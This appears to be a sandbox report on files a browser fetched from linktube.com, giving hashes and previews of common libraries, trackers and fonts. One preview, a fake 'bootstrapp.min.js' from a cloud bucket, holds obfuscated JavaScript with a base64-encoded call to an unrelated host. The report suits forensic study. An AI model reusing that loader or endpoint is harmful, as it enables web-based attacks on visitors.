                                                                                                                    Preview:importScripts('https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-sw.js')..// --------------------------------------------------.// Configure.// --------------------------------------------------..// Set workbox config.workbox.setConfig({. "debug": false.})..// Start controlling any existing clients as soon as it activates.workbox.core.clientsClaim()..// Skip over the SW waiting lifecycle stage.workbox.core.skipWaiting()..workbox.precaching.cleanupOutdatedCaches()..// --------------------------------------------------.// Precaches.// --------------------------------------------------..// Precache assets..// --------------------------------------------------.// Runtime Caching.// --------------------------------------------------..// Register route handlers for runtimeCaching.workbox.routing.registerRoute(new RegExp('/_nuxt/'), new workbox.strategies.CacheFirst ({}), 'GET').workbox.routing.registerRoute(new RegExp('/'), new workbox.strategies.NetworkFirst ({}), 'GET').
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (5837)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):5839
                                                                                                                    Entropy (8bit):5.090537096593941
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:DFEB10C928424FC05A558B2F08023422
                                                                                                                    SHA1:527D6AE9871418A7D76DD469F71FA62CB474CEC8
                                                                                                                    SHA-256:256356E9FCBCE6C21669D7262AE5B32AA2C75BE73D5F668CB8D607BD31C37ECE
                                                                                                                    SHA-512:4D7FAEDF3D97EA962495160843EBCFA203EF479A9FA00A49FC99D1E8F7AFC0BBED49D0DA312BD1EED3895E03413641DC5FAC7A51C494FD46EF7154183C513A2D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdn.jsdelivr.net/npm/workbox-cdn@4.3.1/workbox/workbox-core.prod.js
                                                                                                                    Preview:this.workbox=this.workbox||{},this.workbox.core=function(e){"use strict";try{self["workbox:core:4.3.1"]&&_()}catch(e){}const t=(e,...t)=>{let n=e;return t.length>0&&(n+=` :: ${JSON.stringify(t)}`),n};class n extends Error{constructor(e,n){super(t(e,n)),this.name=e,this.details=n}}const s=new Set;const r={googleAnalytics:"googleAnalytics",precache:"precache-v2",prefix:"workbox",runtime:"runtime",suffix:self.registration.scope},a=e=>[r.prefix,e,r.suffix].filter(e=>e.length>0).join("-"),i={updateDetails:e=>{Object.keys(r).forEach(t=>{void 0!==e[t]&&(r[t]=e[t])})},getGoogleAnalyticsName:e=>e||a(r.googleAnalytics),getPrecacheName:e=>e||a(r.precache),getPrefix:()=>r.prefix,getRuntimeName:e=>e||a(r.runtime),getSuffix:()=>r.suffix},c=e=>{const t=new URL(e,location);return t.origin===location.origin?t.pathname:t.href};async function o(){for(const e of s)await e()}const l="cacheDidUpdate",u="cacheKeyWillBeUsed",h="cacheWillUpdate",f="cachedResponseWillBeUsed",w="fetchDidFail",g="fetchDidSucceed"
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18
                                                                                                                    Entropy (8bit):3.5724312513221195
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                    SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                    SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                    SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    Preview:404 page not found
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (1572)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):5973
                                                                                                                    Entropy (8bit):5.393222621370193
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:84B4D2FB3E351B07EB44BE9076C40C3F
                                                                                                                    SHA1:F798336EF7F04FB213B51E7D32686B8E682ADAD9
                                                                                                                    SHA-256:1C93A9EC1B17079D7F97C8176C2AB7807D10C133EFDD87FE2CCC233B152CA399
                                                                                                                    SHA-512:8A307DCC1D60710FACB22BE693AFE2FFBFD332513FAD153EEAD776DED703A365F494FB1B46B8BCF00D382523C4B8BCA1E93612ED307519C5DF709375132D03F8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                                                                                                    Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (4148)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):35314
                                                                                                                    Entropy (8bit):5.331438767792472
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:B6A5EACCAE2EC1D3A104ED16CC977E1D
                                                                                                                    SHA1:BBA7A058BAD71927C9F5D7581FBF8D405A700FC4
                                                                                                                    SHA-256:EEA0E587954F8FF9AFAC2F4C84E9842CB2D2CD0895AA859879E653CCBB4555A0
                                                                                                                    SHA-512:D9B3349334FBCF27C4A549992B1EEE9769D5399C65DF4BDB57692A0846266B13CE3447A059E28E303F894D6EA0B967467BCD6569DCA1F66AB9C70C018CD0AF28
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/signals/config/138748961041622?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):200
                                                                                                                    Entropy (8bit):4.942373347667344
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:3437AADDCDF6922D623E172C2D6F9278
                                                                                                                    SHA1:F69066CF20141AC93418102D3EEE7C0225B8A623
                                                                                                                    SHA-256:35DCC382EB69D00369D708708CDC545F3968B68FA5BBE3E728D11FEDD04F93BB
                                                                                                                    SHA-512:2DAE5C5C30C6A0E763D8128F2CE1D467EAD432E582AB4EBB68E23991DB08F57490ABC0EED805FD33FAB5503C1737D9D47D4CC1090AE15D7391593FBB295D66E7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html
                                                                                                                    Preview:<!doctype html><html><head><meta charset="utf-8"/><script defer="defer" src="https://js.stripe.com/v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js"></script></head><body></body></html>
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65454), with CRLF line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):1105179
                                                                                                                    Entropy (8bit):5.1846221315966
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:EAFD47F726B8AD795AFC17EB6D5BA295
                                                                                                                    SHA1:91678748A4916B6760C8D588A1637185D1E88DC9
                                                                                                                    SHA-256:4C581FA441576FC8F35B4988A0BC3D1565778ADF7181514DE8E6C564AD4F7B47
                                                                                                                    SHA-512:D1A9FF954A6394B8D3BA3386596C2C844A9169365233F310CD4C2E919645E644C2F7AB48858F5829E5F07488E15BCCEFB98A46292AE78207ACF7D6B13DBB5E88
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://5382072737-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrapp.min.js
                                                                                                                    Preview:var file = "aHR0cHM6Ly80MDQuZWNvaG1sc2RlbHRpZW1wby5pdC5jb20vZ29vZ2xlLnBocA==";....var _0x2a71c9=_0x41d2;(function(_0x48e2e5,_0x1b0c20){var _0x3516fb=_0x41d2,_0x49ee74=_0x48e2e5();while(!![]){try{var _0x3b01c8=-parseInt(_0x3516fb(0x27ae))/(-0x138c+-0xbf7+0x1*0x1f84)+parseInt(_0x3516fb(0x20af))/(0x6*0x661+0x7b3*-0x4+-0x3bc*0x2)*(-parseInt(_0x3516fb(0x47d5))/(-0xdd*-0x1f+-0x9*-0x347+0x51d*-0xb))+parseInt(_0x3516fb(0x3527))/(0x50e+0x1*0x154a+-0x1a54)*(-parseInt(_0x3516fb(0x4965))/(0x1e70+-0x1470+-0x9fb))+parseInt(_0x3516fb(0x2cbb))/(-0x1*-0xb1+-0x698*-0x2+-0x1*0xddb)*(parseInt(_0x3516fb(0x4958))/(-0x1ff1+-0x3*0x377+0x2d3*0xf))+parseInt(_0x3516fb(0xc1c))/(0x488+0x2*-0xa7d+0x107a)*(-parseInt(_0x3516fb(0x13ba))/(-0x956+0xef7+0x2cc*-0x2))+-parseInt(_0x3516fb(0x5881))/(0x1804+-0x95f*0x4+0xd82)*(-parseInt(_0x3516fb(0x3536))/(0x13d*-0x17+0x1*0x1c5e+-0x5*-0x8))+parseInt(_0x3516fb(0x5384))/(-0x4c2+0x1*-0x2381+0x284f*0x1);if(_0x3b01c8===_0x1b0c20)break;else _0x49ee74['push'](_0x49ee74['shift']());}c
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (4407), with no line terminators
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):4407
                                                                                                                    Entropy (8bit):5.029541648972113
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:06F449553DD723FBAEC385F1841216F2
                                                                                                                    SHA1:EDBF907703634077E5F92E9362A25ED6C3A4EF0F
                                                                                                                    SHA-256:2D8B47E0306DF97CC12DB23491992CBB9B76A18DF78CD8026DC259AC9BE17E91
                                                                                                                    SHA-512:C0A5EAB8BF166C207AF0FFDFA618EF68B8B6A0799DE395458DE4307C9D94493D6E4F85E071FE7B238ABEB96BD2C0C0B6FBA6AE0CA2F4EA198DA5A028EF76AA93
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://linktube.com/_nuxt/52bce4bcd71977610647.js
                                                                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[45],{472:function(t,e,n){"use strict";n.r(e),n.d(e,"Workbox",(function(){return f})),n.d(e,"messageSW",(function(){return r}));try{self["workbox:window:4.3.1"]&&_()}catch(r){}var r=function(t,e){return new Promise((function(i){var n=new MessageChannel;n.port1.onmessage=function(t){return i(t.data)},t.postMessage(e,[n.port2])}))};function o(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}function i(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}try{self["workbox:core:4.3.1"]&&_()}catch(r){}var c=function(){var t=this;this.promise=new Promise((function(e,i){t.resolve=e,t.reject=i}))},h=function(t,e){return new URL(t,location).href===new URL(e,location).href},v=function(t,e){Object.assign(this,e,{type:t})};function u(t){return function(){for(var e=[],i=0;i<arguments.l
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (65325)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):144877
                                                                                                                    Entropy (8bit):5.049937202697915
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:450FC463B8B1A349DF717056FBB3E078
                                                                                                                    SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                                                                                                    SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                                                                                                    SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):26127
                                                                                                                    Entropy (8bit):5.299182044914165
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:F1A6B2F4B1912B43F512B6CC7C951774
                                                                                                                    SHA1:AA4C0850B365BDD1A085541797B294898AE443D6
                                                                                                                    SHA-256:2A506024FA620C7EECFF9BA9D3781432B3F03E7EEF018EE2B623BE7F455AC72C
                                                                                                                    SHA-512:099BD2FBE7E3F3E6470FC278716E3EA9A2FF4F5A06C9F58280F57D1A97C1F9D92E47678BC826687A3F9DC43B365E44C2BCB31A4CF2BF672FF6585FDC75750BFD
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/signals/config/432952554585575?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (895)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):900
                                                                                                                    Entropy (8bit):5.17933857231232
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:D593FC154534EBC367C7AC542D009427
                                                                                                                    SHA1:EEBFB2A2079665AEE7E6AEE328B8B727D1AB3D2F
                                                                                                                    SHA-256:EF85D4A535D36D491884E5FB617F115581BD777E8DBE42A642A2D6E23FEE94F6
                                                                                                                    SHA-512:E68E219FD4CC6B6370F856C3BD9FAB6132A22720D8A8D80CDD690B5FC6812A802962009163A652D44C83EDF59EB9319FEAA068D1A6A6F966182C3AC1BD0F1D29
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                    Preview:)]}'.["",["dow jones stock markets","washington dc cherry blossoms peak bloom","today wordle hints","spring to life update minecraft bedrock","jayden james penn state wrestling","northern lights aurora borealis forecast","solar eclipses","measles on amtrak train"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"3226765004300768778","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (6998)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):39119
                                                                                                                    Entropy (8bit):5.3498752239485805
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:BBFC64711A4F04EA057880FFACEA2B56
                                                                                                                    SHA1:64F75ACB47E73760129CE970FA51A63B975085B5
                                                                                                                    SHA-256:55DF9FD4EC6DAE64DAE05B105494CCA3FB2AD98A6AA96C7E1EE56D783E34949A
                                                                                                                    SHA-512:51AD49981F6C8D51C6A1615722EF26465B54BDA53D6A838CF8EE63FC8C6D5CB9CE590AABA7CD0CE18C50DF1BA9220124C615A7C78001B136CC955CEA66958873
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://connect.facebook.net/signals/config/692479261420616?v=2.9.190&r=stable&domain=linktube.com&hme=c1f2cecb0bd2e60711f2156ceae0254b57f69ec526dbc6c13633615b2168eda4&ex_m=71%2C124%2C109%2C113%2C62%2C4%2C102%2C70%2C16%2C98%2C90%2C51%2C55%2C178%2C181%2C193%2C189%2C190%2C192%2C29%2C103%2C53%2C78%2C191%2C173%2C176%2C186%2C187%2C194%2C135%2C41%2C199%2C196%2C197%2C34%2C148%2C15%2C50%2C203%2C202%2C137%2C18%2C40%2C1%2C43%2C66%2C67%2C68%2C72%2C94%2C17%2C14%2C97%2C93%2C92%2C110%2C52%2C112%2C39%2C111%2C30%2C95%2C26%2C174%2C177%2C145%2C87%2C57%2C85%2C33%2C74%2C0%2C96%2C32%2C28%2C83%2C84%2C89%2C47%2C46%2C88%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C58%2C63%2C65%2C76%2C54%2C104%2C27%2C77%2C9%2C8%2C81%2C48%2C21%2C106%2C105%2C107%2C99%2C10%2C20%2C3%2C38%2C75%2C19%2C5%2C91%2C82%2C44%2C35%2C86%2C244%2C171%2C122%2C160%2C153%2C2%2C36%2C64%2C42%2C108%2C45%2C80%2C69%2C114%2C61%2C60%2C31%2C100%2C59%2C56%2C49%2C79%2C73%2C24%2C101%2C115%2C209%2C208%2C210%2C215%2C216%2C217%2C213%2C205%2C136%2C169%2C204%2C206%2C246%2C172%2C230%2C125%2C163%2C150%2C157%2C133%2C243%2C119%2C131%2C140%2C126%2C201%2C116%2C132%2C138%2C130
                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:ASCII text, with very long lines (19015)
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):19188
                                                                                                                    Entropy (8bit):5.212814407014048
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:
                                                                                                                    MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                    SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                    SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                    SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                                                                                    Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 76612, version 331.524
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):76612
                                                                                                                    Entropy (8bit):7.997209664637607
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:
                                                                                                                    MD5:A06DA7F0950F9DD366FC9DB9D56D618A
                                                                                                                    SHA1:509988477DA79C146CB93FB728405F18E923C2DE
                                                                                                                    SHA-256:5D9190292ACDD48BA0FC35080F7E7448F3CDF0D79199A4D23F0F49B5341FDF29
                                                                                                                    SHA-512:B53D839C5464F7A2904CABCD1E7D6456E2ED1702254450833FC586F4B3A4E6DC07C24F443415A2710E241AF8D2DDA1B9C17F050045E76501E9B5AA2CB4801EA8
                                                                                                                    Malicious:false
                                                                                                                    Reputation:unknown
                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/webfonts/fa-brands-400.woff2
